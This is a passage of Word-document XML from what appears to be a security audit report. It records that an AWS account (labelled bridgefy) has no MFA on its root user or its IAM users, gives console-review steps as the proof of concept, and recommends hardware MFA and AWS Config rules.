          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://us-east-1.console.aws.amazon.com/iamv2/home?#/home</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="75"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>An</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>alert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>appears</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>due</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>missing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>MFA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>user.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="15"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487621120">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>171221</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="89" name="Graphic 89"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="89" name="Graphic 89"/>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3.482012pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15695360;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape73" coordorigin="1440,270" coordsize="2880,0" path="m1440,270l4320,270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2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>144</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="23"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId217">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://aws.amazon.com/iam/identity-center/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>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48"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="580" w:lineRule="atLeast" w:before="0"/>
        <w:ind w:left="720" w:right="2565" w:firstLine="1661"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="0" simplePos="0" relativeHeight="15762432">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1438038</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-1715915</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5368954" cy="1844558"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>
            <wp:docPr id="90" name="Image 90"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="90" name="Image 90"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId218" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5368954" cy="1844558"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fig.:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>does</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>have</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MFA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>enabled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Issue 2: Weaknesses in MFA for regular AWS accounts Affected Resources:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="41"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Account</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-9"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>292595537002</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-8"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>(bridgefy)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>PoC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Steps:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Review</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>without</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> MFA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Navigate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>IAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>view,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>AWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Management</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Console</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>URL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:hyperlink r:id="rId219">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:u w:val="single" w:color="1154CC"/>
          </w:rPr>
          <w:t>https://us-east-1.console.aws.amazon.com/iamv2/home?#/users</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1438" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="38" w:after="0"/>
        <w:ind w:left="1438" w:right="0" w:hanging="358"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Review</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>without</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MFA.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>MFA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>enabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>IAM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>user.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:after="0"/>
        <w:sectPr>
          <w:pgSz w:w="12240" w:h="15840"/>
          <w:pgMar w:header="0" w:footer="1147" w:top="1780" w:bottom="1340" w:left="1440" w:right="1080"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="74"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="754"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5441065" cy="2706624"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="91" name="Image 91"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="91" name="Image 91"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId220" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5441065" cy="2706624"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="96"/>
        <w:ind w:left="0" w:right="363" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Fig.:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-7"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Multiple</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>without</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-6"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MFA</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to consider enabling a hardware-based MFA mechanism for highly privileged users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>145</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. Additionally, the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>AWS Config </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>rule</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>146</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> should be configured to ensure the account is compliant with best security practices. It is further encouraged to make</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>AWS Config </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>rule the preferred way to monitor and enforce consistent settings and best practices across AWS accounts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="368"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>further</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>advised</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>enforce</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>147</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>regular</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>MFA.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
